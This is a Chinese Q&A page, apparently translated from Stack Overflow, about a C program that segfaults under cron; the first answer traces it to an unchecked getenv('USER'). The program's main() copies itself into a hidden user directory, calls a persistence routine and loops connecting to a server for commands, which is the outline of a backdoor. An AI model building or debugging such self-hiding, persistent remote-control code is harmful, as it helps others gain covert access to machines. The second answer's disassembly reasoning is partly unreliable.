在 Linux 上使用 crontab 运行我自己的 C 程序时出现分段错误

Question

unname -a：

Linux deepin 5.4.70-amd64-desktop #1 SMP Wed Oct 14 15:24:23 CST 2020 x86_64 GNU/Linux

我正在编写一个适用于目录和 sockets 的 C 程序。 当我通过命令行运行它时，它按预期工作，但是当我通过 cron 运行时，它会遇到分段错误。

这是我的程序的入口点（以及相关部分，我认为）。

#include "../include/persistence.h"

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <libgen.h>
        
#include "../include/sockets.h"
#include "../include/footprint.h"
#include "../include/commands.h"

int
main(int argc, char *argv[]) {
    char    destination_path[2048] = { 0 };
    char    *exec_filename;
    char    *safe_exec_filename;
    char    *username;

    (void)argc;  // to prevent compiler warning about unused argc
    username = getenv("USER");
    safe_exec_filename = strdup(argv[0]);  // for safe use of basename()
    exec_filename = basename(safe_exec_filename);
    sprintf(destination_path, "/home/%s/.local/bin/", username);
    if (!file_exists(destination_path)) {
        if (create_dir(destination_path)) {
            strcat(destination_path, exec_filename);
            hide_file(argv[0], destination_path);
        }
    }
    if ((strlen(exec_filename) + strlen(destination_path)) > 2048) {
        printf("BUFFER TOO SMALL\n");
        return 1;
    }
    strcat(destination_path, exec_filename);
    printf("%s\n", destination_path);
    if (!file_exists(destination_path)) {
        hide_file(argv[0], destination_path);
    }
    if (safe_exec_filename != NULL) {
        free(safe_exec_filename);
    }
    persistence(destination_path);
    while (1) {
        int16_t server_socket = connect_to_server();

        start_communication(server_socket);
    }
    return 0;
}

通过命令行从任何（相对/绝对）路径执行二进制文件工作正常，但使用 cron，“什么都没有”发生。 分析 /var/log/syslog 时，显示如下：

Mar  4 15:27:01 deepin CRON[14713]: (user) CMD (/home/user/.local/bin/myprogram)
Mar  4 15:27:01 deepin kernel: [ 5934.175052] myprogram[22332]: segfault at 0 ip 00007f4fb5cea327 sp 00007ffd74362328 error 4 in libc-2.28.so[7f4fb5c6f000+148000]
Mar  4 15:27:01 deepin kernel: [ 5934.175060] Code: 0f 7f 27 f3 0f 7f 6f 10 f3 0f 7f 77 20 48 83 c6 30 48 83 c7 30 4c 8d 1d 47 f7 0d 00 49 63 0c 93 49 8d 0c 0b ff e1 66 0f ef c0 <f3> 0f 6f 0e f3 0f 6f 56 10 66 0f 74 c1 66 0f d7 d0 48 85 d2 75 6b

还有我的 crontab -l output：

* * * * * /home/user/.local/bin/myprogram

PS：我尝试了@reboot，但将 * * * * * 更改为“调试”。 在使用@reboot 并检查日志时，也会出现分段错误。 检查 /var/mail/user，它显示：

Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/home/user>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=user>
Message-Id: <20210304184201.5A18124898@deepin>
Date: Thu,  4 Mar 2021 15:27:02 -0300 (-03)

Segmentation fault

编辑1：我已经尝试（在主函数的顶部）放置一个创建文件的function，写入并保存。 这个 function 永远不会执行。 我创建了另一个程序，其中只有一个主 function 写入文件并保存。 将二进制文件放在 myprogram 的同一文件夹中并为其创建一个 cron 并且它可以正常执行（我可以看到生成的文件并且日志上没有显示段错误或其他错误）。

Answer 1

当您从 shell 运行程序时，它设置了许多环境变量，从 cron 运行时可能存在也可能不存在。 USER就是其中之一。 您应该检查系统的文档，但我的有：

cron(8) 守护进程会自动设置几个环境变量。 SHELL 设置为 /bin/sh，LOGNAME 和 HOME 是从 crontab 所有者的 /etc/passwd 行设置的。 HOME 和 SHELL 可能会被 crontab 中的设置覆盖； LOGNAME 可能不会。

（另一个注意事项：在 BSD 系统上，LOGNAME 变量有时称为 USER...在这些系统上，也会设置 USER。）

所以USER可能没有被定义。 如果不是，那么getenv("USER")将返回 NULL，但您不对此进行测试，因此username名将是 NULL 和 segfault，当您将其传递给sprintf时。

您也许可以改用LOGNAME ，或者跳过环境变量并使用getpwuid(getuid())之类的内容查找用户名。

无论如何，更多的错误检查通常是一个好主意，以防止更多此类错误。

Answer 2

我认为问题可能来自各种问题：

为什么需要循环连接服务器？

while (1) {
        int16_t server_socket = connect_to_server();

        start_communication(server_socket);
    }
    return 0;

也许应该是：

    int16_t server_socket = connect_to_server();
    while (1) {
        start_communication(server_socket);
    }
    return 0;

---

而不是：

free(safe_exec_filename);

利用：

if (safe_exec_filename == NULL) {
    dprintf(2, "Safe exec filename is NULL");
    return 1;
}
free(safe_exec_filename);

---

还使用 cron 和您的 c 程序打印safe_exec_filename并查看是否存在差异，您的段错误的程序集如下：

---

你的 char 数组变得太小了：

0:  0f 7f 27                movq   QWORD PTR [edi],mm4
3:  f3 0f 7f 6f 10          movdqu XMMWORD PTR [edi+0x10],xmm5
8:  f3 0f 7f 77 20          movdqu XMMWORD PTR [edi+0x20],xmm6
d:  48                      dec    eax
e:  83 c6 30                add    esi,0x30
11: 48                      dec    eax
12: 83 c7 30                add    edi,0x30
15: 4c                      dec    esp
16: 8d 1d 47 f7 0d 00       lea    ebx,ds:0xdf747
1c: 49                      dec    ecx
1d: 63 0c 93                arpl   WORD PTR [ebx+edx*4],cx
20: 49                      dec    ecx
21: 8d 0c 0b                lea    ecx,[ebx+ecx*1]
24: ff e1                   jmp    ecx
26: 66 0f ef c0             pxor   xmm0,xmm0
2a: f3 0f 6f 0e             movdqu xmm1,XMMWORD PTR [esi]
2e: f3 0f 6f 56 10          movdqu xmm2,XMMWORD PTR [esi+0x10]
33: 66 0f 74 c1             pcmpeqb xmm0,xmm1
37: 66 0f d7 d0             pmovmskb edx,xmm0
3b: 48                      dec    eax
3c: 85 d2                   test   edx,edx
3e: 75 6b                   jne    0xab

所以我主要担心的是它可能与目标路径的缓冲区变得太小有关，因为 cron 使用相对路径而不是绝对路径：

strcat(destination_path, exec_filename);

尝试更改缓冲区大小：

#define SIZE 2048
char    destination_path[SIZE] = { 0 };

并添加支票：

if ((strlen(exec_filename) + strlen(destination_path)) > SIZE)
{ error handling}
strcat(destination_path, exec_filename);